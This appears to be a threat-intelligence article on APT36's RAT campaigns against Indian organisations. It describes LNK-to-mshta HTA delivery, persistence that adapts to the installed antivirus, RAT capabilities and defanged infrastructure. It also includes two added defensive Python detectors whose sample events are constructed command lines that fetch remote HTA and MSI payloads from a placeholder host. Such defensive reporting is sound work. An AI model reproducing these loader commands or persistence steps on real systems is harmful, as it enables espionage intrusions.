
India Under Siege: Transparent Tribe’s Evolving Cyber Espionage Tactics


In a significant escalation of cyber warfare, the notorious state-sponsored threat actor, Transparent Tribe — also known as APT36 — has launched a fresh wave of sophisticated remote access trojan (RAT) attacks. These campaigns are meticulously designed to infiltrate and maintain persistent control over critical Indian governmental, academic, and strategic entities, underscoring a relentless focus on intelligence gathering.

Transparent Tribe’s Renewed Onslaught

Operating since at least 2013, Transparent Tribe has cemented its reputation as a formidable force in cyber espionage, primarily targeting Indian organizations. This adversary continually refines its arsenal, deploying an array of potent RATs such as CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT, each capable of granting deep, persistent access to compromised systems. The latest offensive, detailed by cybersecurity firm CYFIRMA, highlights the group’s evolving tactics and unwavering determination.

Deceptive Delivery: The LNK File Trap

The initial vector for these attacks is a cunningly crafted spear-phishing email. Victims receive a ZIP archive containing a weaponized Windows shortcut (LNK) file. This LNK file is ingeniously disguised as a legitimate PDF document, even embedding full PDF content to completely disarm user suspicion.
Upon execution, the LNK file doesn’t directly unleash the RAT. Instead, it triggers a remote HTML Application (HTA) script via “mshta.exe.” This HTA script acts as a sophisticated loader, decrypting and injecting the final RAT payload directly into memory, thus minimizing its footprint on disk. Crucially, to further allay any suspicion, the HTA simultaneously downloads and opens the decoy PDF document, presenting a seemingly harmless interaction to the user.
CYFIRMA notes that this HTA leverages ActiveX objects, particularly WScript.Shell, for environment profiling and runtime manipulation. This adaptive behavior ensures compatibility with the target system and enhances execution reliability – hallmarks of advanced malware exploiting mshta.exe.
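The delivery chain above (LNK opened from Explorer, mshta.exe pulling a remote HTA, or an HTA launched from a batch file) is what a process-creation detection should key on. The following is an added example, not code from CYFIRMA or from the report: it runs three simple rules over constructed Sysmon-style events. The event format, hostnames and the exact cmd.exe syntax used to retrieve the MSI are assumptions.

```python
import re
from typing import Iterator, Optional

# Constructed sample events (not real telemetry) in a simplified
# "Image|ParentImage|CommandLine" form modelled on Sysmon Event ID 1.
# Hostnames are placeholders, not the report's infrastructure.
SAMPLE_EVENTS = """\
C:\\Windows\\System32\\mshta.exe|C:\\Windows\\explorer.exe|mshta.exe https://stage.example.invalid/loader.hta
C:\\Windows\\System32\\cmd.exe|C:\\Windows\\explorer.exe|cmd.exe /c start https://stage.example.invalid/pkg.msi
C:\\Windows\\System32\\mshta.exe|C:\\Windows\\System32\\cmd.exe|mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\p.hta
C:\\Windows\\System32\\notepad.exe|C:\\Windows\\explorer.exe|notepad.exe notes.txt
"""

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def parse_events(text: str) -> Iterator[dict]:
    for line in text.splitlines():
        image, parent, cmdline = line.split("|", 2)
        yield {"image": basename(image), "parent": basename(parent), "cmdline": cmdline}

def classify(event: dict) -> Optional[str]:
    """Map one process-creation event to a finding label, or None."""
    cmd = event["cmdline"]
    url = REMOTE_URL.search(cmd)
    # Rule 1: mshta.exe handed a remote URL, the in-memory loader stage described above.
    if event["image"] == "mshta.exe" and url:
        return "mshta_remote_hta"
    # Rule 2: mshta.exe spawned by cmd.exe, i.e. an HTA launched from a batch file.
    if event["image"] == "mshta.exe" and event["parent"] == "cmd.exe":
        return "mshta_from_batch"
    # Rule 3: a child of explorer.exe (where a double-clicked LNK runs) that
    # references a remote .msi or .hta; the cmd.exe syntax here is an assumption.
    if event["parent"] == "explorer.exe" and url and url.group(0).lower().endswith((".msi", ".hta")):
        return "explorer_child_remote_payload"
    return None

def detect(text: str) -> list:
    """Return (command line, label) pairs for every event a rule matches."""
    findings = []
    for event in parse_events(text):
        label = classify(event)
        if label:
            findings.append((event["cmdline"], label))
    return findings

if __name__ == "__main__":
    for cmdline, label in detect(SAMPLE_EVENTS):
        print(f"{label:30} {cmdline}")
```

Rule 1 is the highest-confidence signal; rules 2 and 3 will need tuning against legitimate installers and login scripts in a real estate.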

Adaptive Persistence: Evading Detection

One of the most remarkable aspects of this new RAT campaign is its dynamic approach to establishing persistence. The malware intelligently adapts its methods based on the antivirus solutions detected on the infected machine:

  • If Kaspersky is present: It creates a working directory, writes an obfuscated HTA payload to disk, and establishes persistence by dropping an LNK file in the Windows Startup folder, which then launches the HTA script.
  • If Quick Heal is detected: Persistence is achieved by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload, and executing it via the batch script.
  • If Avast, AVG, or Avira are found: The payload is directly copied into the Startup directory and executed.
  • If no recognized antivirus is detected: The malware defaults to a combination of batch file execution, registry-based persistence, and payload deployment before launching the batch script.

This multi-faceted approach significantly increases the malware’s chances of maintaining a foothold, even against varying security postures.

The RAT’s Arsenal: Capabilities Unveiled

The second-stage HTA file ultimately deploys a powerful DLL, identified as “iinneldc.dll,” which functions as a full-featured remote access trojan. Its capabilities are extensive, enabling the attackers to:

  • Exert remote control over the compromised system.
  • Manage and manipulate files.
  • Exfiltrate sensitive data.
  • Capture screenshots.
  • Manipulate the clipboard.
  • Control running processes.

These functions grant Transparent Tribe comprehensive control, allowing for deep intelligence gathering and sustained espionage operations.

A Second Front: The NCERT Advisory Lure

In recent weeks, APT36 has also been linked to another distinct campaign. This one utilizes a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader. This loader, in turn, drops additional executables and malicious DLLs, facilitating remote command execution, system reconnaissance, and long-term access.
The shortcut executes an obfuscated command via cmd.exe to retrieve an MSI installer (“nikmights.msi”) from a remote server (aeroclubofindia.co[.]in). This installer orchestrates a series of actions:

  • Extracts and displays a legitimate decoy PDF (a PKCERT advisory from 2024 regarding a fraudulent WhatsApp campaign).
  • Decodes and writes DLL files (pdf.dll, wininet.dll) to C:\ProgramData\PcDirvs.
  • Drops and executes PcDirvs.exe after a 10-second delay.
  • Establishes persistence by creating PcDirvs.hta with Visual Basic Script to modify the Registry, ensuring PcDirvs.exe launches at every system startup.

While the associated command-and-control (C2) infrastructure (dns.wmiprovider[.]com) is currently inactive, the robust Windows Registry-based persistence mechanism ensures that this threat can be reactivated at any future time, posing a continuous dormant danger.
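Both campaigns persist through the same two places: the Startup folder (an LNK or batch file that launches an HTA, per the adaptive-persistence section above) and the Registry (PcDirvs.exe relaunched at boot, per the NCERT lure). The following is an added triage example, not code from CYFIRMA or the report: it scores constructed Startup-folder entries and Run-key values against those patterns. Modelling the Registry change as a Run-key value is an assumption, since the report only says the Registry is modified; apart from PcDirvs.exe and its ProgramData path, every file name is made up.

```python
import shlex
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
SCRIPT_EXTS = {".hta", ".bat", ".cmd", ".vbs", ".js"}
DROP_ROOTS = ("c:\\programdata\\", "c:\\users\\")  # user-writable locations

# Constructed inputs: Startup-folder entries as (file name, resolved LNK target
# or the file's own path) and Run-key values as (value name, command).
STARTUP_ENTRIES = [
    ("Update.lnk", "C:\\Windows\\System32\\mshta.exe C:\\Users\\u\\AppData\\Roaming\\svc\\u.hta"),
    ("run.bat", '"C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\run.bat"'),
    ("OneDrive.lnk", '"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe" /background'),
]
RUN_VALUES = [
    ("PcDirvs", "C:\\ProgramData\\PcDirvs\\PcDirvs.exe"),
    ("SecurityHealth", "C:\\Windows\\System32\\SecurityHealthSystray.exe"),
]

def check_command(command: str) -> list:
    """Reasons a launch command matches the persistence patterns described above."""
    # posix=False keeps Windows backslashes literal; quotes are then stripped per token.
    tokens = [t.strip('"').lower() for t in shlex.split(command, posix=False)]
    if not tokens:
        return []
    reasons = []
    host = PureWindowsPath(tokens[0]).name
    if host in SCRIPT_HOSTS:
        reasons.append(f"launched via script host {host}")
    if any(PureWindowsPath(t).suffix in SCRIPT_EXTS for t in tokens):
        reasons.append("references a script file")
    if tokens[0].startswith(DROP_ROOTS):
        reasons.append("runs from a user-writable drop location")
    return reasons

def triage(startup_entries, run_values) -> dict:
    """Return {artefact: [reasons]} for every entry that looks like campaign persistence."""
    findings = {}
    for name, target in startup_entries:
        reasons = check_command(target)
        if PureWindowsPath(name).suffix.lower() in SCRIPT_EXTS:
            reasons.append("script placed directly in the Startup folder")
        if reasons:
            findings[f"Startup\\{name}"] = reasons
    for name, command in run_values:
        reasons = check_command(command)
        if reasons:
            findings[f"Run\\{name}"] = reasons
    return findings
```

On a live host the same two functions can be fed the real Startup folder listing (with LNK targets resolved) and the HKCU/HKLM Run values.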

Persistent Threat, Evolving Tactics

CYFIRMA’s analysis underscores that APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat. Their sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors demands constant vigilance. The group’s continuous evolution of delivery techniques, payload capabilities, and adaptive persistence mechanisms highlights the sophisticated and enduring nature of this cyber threat. Organizations in India must remain proactive in their defense strategies to counter these advanced and persistent threats.

